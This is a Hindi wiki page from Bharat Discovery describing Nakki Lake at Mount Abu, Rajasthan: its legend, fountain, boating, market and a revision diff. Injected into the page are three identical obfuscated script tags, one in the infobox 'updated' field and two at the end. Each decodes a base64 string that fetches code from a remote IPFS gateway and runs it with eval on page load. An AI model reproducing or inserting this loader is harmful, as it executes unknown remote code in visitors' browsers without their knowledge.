Difference between revisions of "नक्की झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "हिन्दु " to "हिन्दू ")
 
(24 intermediate revisions by 9 users not shown)
Line 1: Line 1:
[[चित्र:Nakki-Jheel-Mount-Abu-Rajasthan.jpg|नक्की झील, [[माउंट आबू]] <br /> Nakki Jheel, Mount Abu|thumb|250px]]
+
{{सूचना बक्सा झील
[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
+
|चित्र=Nakki-Jheel-Mount-Abu-Rajasthan.jpg
 +
|चित्र का नाम=नक्की झील, माउंट आबू
 +
|नाम=नक्की झील
 +
|प्रकार=
 +
|देश=[[भारत]]
 +
|राज्य=[[राजस्थान]]
 +
|नगर=[[माउंट आबू]]
 +
|निर्देशांक=[http://maps.google.com/maps?q=24.597861,72.715931+&hl=en&ll=24.597509,72.710567&spn=0.008975,0.021136&sll=37.0625,-95.677068&sspn=32.059939,86.572266&vpsrc=6&t=m&z=16&iwloc=near उत्तर- 24° 35' 52.30", पूर्व-72° 42' 57.35"]
 +
|अधिकतम लंबाई=
 +
|अधिकतम गहराई= 80 फुट
 +
|अधिकतम चौड़ाई=
 +
|सतह की ऊँचाई=
 +
|जल क्षमता=
 +
|जल का ठहराव समय=
 +
|गूगल मानचित्र=[http://maps.google.com/maps?q=Nakki+Lake,+Mount+Abu,+Rajasthan&hl=en&ll=24.597861,72.715931&spn=0.01795,0.042272&sll=37.0625,-95.677068&sspn=32.059939,86.572266&vpsrc=6&hnear=Nakki+Lake&t=m&z=15 गूगल मानचित्र]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=एक किवदंती है कि इसका निर्माण देवताओं ने अपने नाख़ूनों से खोद कर किया था इसीलिए इसका नाम नक्की झील पड़ा।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|13:32, 24 दिसम्बर 2011 (IST)}}
 +
}}'''नक्की झील''' [[माउंट आबू]] का प्रमुख आकर्षण है। इस सुंदर [[झील]] के किनारे एक सुंदर बगीचा है। यहाँ शाम के समय घूमने और नौका विहार के लिए पर्यटकों का हुजूम उमड़ पड़ता है। नक्की झील [[राजस्थान]] की सबसे ऊँची झील है।
 +
[[चित्र:Nakki-Jheel-Mount-Abu-Rajasthan-1.jpg|thumb|250|left|नक्की झील]]
 +
*एक किवदंती है कि इसका निर्माण [[देवता|देवताओं]] ने अपने नाख़ूनों से खोद कर किया था इसीलिए इसका नाम नक्की झील पड़ा।
 +
* यह झील सर्दियों में अक्सर जम जाया करती है। झील के किनारे ही यहाँ का मुख्य बाज़ार है जहाँ शाम के समय मेला सा लगा रहता है । इस बाज़ार की वस्तुओं में अधिकतर राजस्थानी व गुजराती छाप नजर आती है।<ref>{{cite web |url=http://bharat-darshan-yatra.blogspot.com/2009/06/blog-post_21.html |title=नक्की झील |accessmonthday=[[16 मई]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=भारत यात्रा |language=[[हिन्दी]] }}</ref>
 +
*नक्की झील माउंट आबू का दिल है। प्राकृतिक सौंदर्य का नैसर्गिक आनंद देने वाली यह झील चारों ओर पर्वत श्रृंखलाओं से घिरी है। झील में एक टापू को 70 अश्वशक्ति से चलित विभिन्न रंगों में जल फ़व्वारा लगाकर आकर्षक बनाया गया है जिसकी धाराएँ 80 फुट की ऊँचाई तक जाती हैं। आरंभ में इसे नख की झील कहा जाता था। समय के साथ बदल कर इसका नाम नक्की झील पड़ गया।
 +
*झील से चारों ओर के पहाड़ियों का नज़ारा बेहद सुंदर दिखता है। हरी-भरी पहाडि़यों से घिरी नक्की झील लगभग ढाई किलोमीटर के दायरे में फैली है। इस के चारों तरफ एक साफ-सुथरी सड़क है। इसके किनारे एक छोटा-सा पार्क है।
 +
*झील के किनारे पर बैठे कर काफ़ी देर तक लोग झील में तैरते सफ़ेद जलचर और तैरती नौकाओं को देखते है और नौका विहार का आनंद लेते हैं। झील के पास एक पार्क है वहाँ लोग [[रंग]]-बिरंगी पोशाक किराये पर लेकर तसवीरें खिंचते हैं।<ref>{{cite web |url=http://webvarta.com/script_detail.php?script_id=2906&catid=11 |title=राजस्थान का ख़ूबसूरत और एकमात्र हिल स्टेशन माउंट आबू |accessmonthday=[[13 जून]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=वेब वार्ता |language=[[हिन्दी]] }}</ref>
 +
*[[गरासिया|गरासिया जनजाति]] के लोग अपने पूर्वजों की अस्थियों को नक्की झील में विसर्जित करते हैं।
  
*माउंट आबू के मध्य में स्थित यह झील माउंट आबू का सबसे पहला आकर्षण का केन्द्र है।
+
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध=}}
*नक्की झील माउंट आबू का दिल है।
+
==वीथिका==
*नक्की झील माउंट आबू का एक बेहतरीन पर्यटक स्थल है।
+
<gallery>
*प्राकृतिक सौंदर्य का नैसर्गिक आनंद देनेवाली यह झील चारों ओऱ पर्वत शृंखलाओं से घिरी है।
+
चित्र:Nakki-Jheel-Mount-Abu-2.jpg|नक्की झील, [[माउंट आबू]]
*झील में एक टापू को 70 अश्वशक्ति से चलित विभिन्न रंगों में जल फव्वारा लगाकर आकर्षक बनाया गया है जिसकी धाराएँ 80 फुट की ऊँचाई तक जाती हैं।
+
चित्र:Nakki-Jheel-Mount-Abu-3.jpg|नक्की झील, [[माउंट आबू]]
*नक्की झील सर्दियों में अक्सर जम जाया करती है।
+
</gallery>
*एक हिन्दू देवता ने अपने नाखूनों से खोदकर यह झील बनाई थी। इसीलिए इसे नक्की (नख या नाखून)नाम से जाना जाता है।
+
==टीका टिप्पणी और संदर्भ==
*आरंभ में इसे नख की झील कहा जाता था। समय के साथ बदल कर इसका नाम नक्की झील पड़ गया।
+
<references/>
*झील से चारों ओर के पहाड़ियों का नज़ारा बेहद सुंदर दिखता है।
+
==संबंधित लेख==
*हरी-भरी पहाडि़यों से घिरी नक्की झील लगभग ढाई किमी. के दायरे में फैली है।
+
{{राजस्थान की झीलें}}{{भारत की झीलें}}{{राजस्थान के पर्यटन स्थल}}
*इस के चारों तरफ एक साफ-सुथरी सड़क है। इसके किनारे एक छोटा-सा पार्क है।
+
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]
*झील में नौका विहार की भी व्यवस्था है।
+
[[Category:माउंट आबू]][[Category:राजस्थान की झीलें]][[Category:भारत की झीलें]]
*झील के किनारे पर बैठे कर काफी देर तक लोग झील में तैरते सफेद जलचर और तैरती नौकाओं को देखते है और नौका विहार का आनंद लेते है। 
 
*झील के पास एक पार्क है वहाँ लोग रंग-बिरंगी पोशाक किराये पर लेकर तसवीरें खिंचते है।
 
==सम्बंधित लिंक==
 
{{राजस्थान के पर्यटन स्थल}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:माउंट आबू]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 16:21, 24 May 2021

nakki jhil
nam nakki jhil
desh bharat
rajy rajasthan
nagar/zila mauant aboo
nirdeshaank uttar- 24° 35' 52.30", poorv-72° 42' 57.35"
adhikatam gaharaee 80 phut
googal manachitr googal manachitr
any janakari ek kivadanti hai ki isaka nirman devataoan ne apane nakhoonoan se khod kar kiya tha isilie isaka nam nakki jhil p da.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nakki jhil mauant aboo ka pramukh akarshan hai. is suandar jhil ke kinare ek suandar bagicha hai. yahaan sham ke samay ghoomane aur nauka vihar ke lie paryatakoan ka hujoom um d p data hai. nakki jhil rajasthan ki sabase ooanchi jhil hai. thumb|250|left|nakki jhil

  • ek kivadanti hai ki isaka nirman devataoan ne apane nakhoonoan se khod kar kiya tha isilie isaka nam nakki jhil p da.
  • yah jhil sardiyoan mean aksar jam jaya karati hai. jhil ke kinare hi yahaan ka mukhy bazar hai jahaan sham ke samay mela sa laga rahata hai . is bazar ki vastuoan mean adhikatar rajasthani v gujarati chhap najar ati hai.[1]
  • nakki jhil mauant aboo ka dil hai. prakritik sauandary ka naisargik anand dene vali yah jhil charoan or parvat shrriankhalaoan se ghiri hai. jhil mean ek tapoo ko 70 ashvashakti se chalit vibhinn rangoan mean jal favvara lagakar akarshak banaya gaya hai jisaki dharaean 80 phut ki ooanchaee tak jati haian. aranbh mean ise nakh ki jhil kaha jata tha. samay ke sath badal kar isaka nam nakki jhil p d gaya.
  • jhil se charoan or ke paha diyoan ka nazara behad suandar dikhata hai. hari-bhari pahadi़yoan se ghiri nakki jhil lagabhag dhaee kilomitar ke dayare mean phaili hai. is ke charoan taraph ek saph-suthari s dak hai. isake kinare ek chhota-sa park hai.
  • jhil ke kinare par baithe kar kafi der tak log jhil mean tairate safed jalachar aur tairati naukaoan ko dekhate hai aur nauka vihar ka anand lete haian. jhil ke pas ek park hai vahaan log rang-birangi poshak kiraye par lekar tasavirean khianchate haian.[2]
  • garasiya janajati ke log apane poorvajoan ki asthiyoan ko nakki jhil mean visarjit karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

  1. nakki jhil (hindi) (ech.ti.em.el) bharat yatra. abhigaman tithi: 16 mee, 2011.
  2. rajasthan ka khoobasoorat aur ekamatr hil steshan mauant aboo (hindi) veb varta. abhigaman tithi: 13 joon, 2010.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>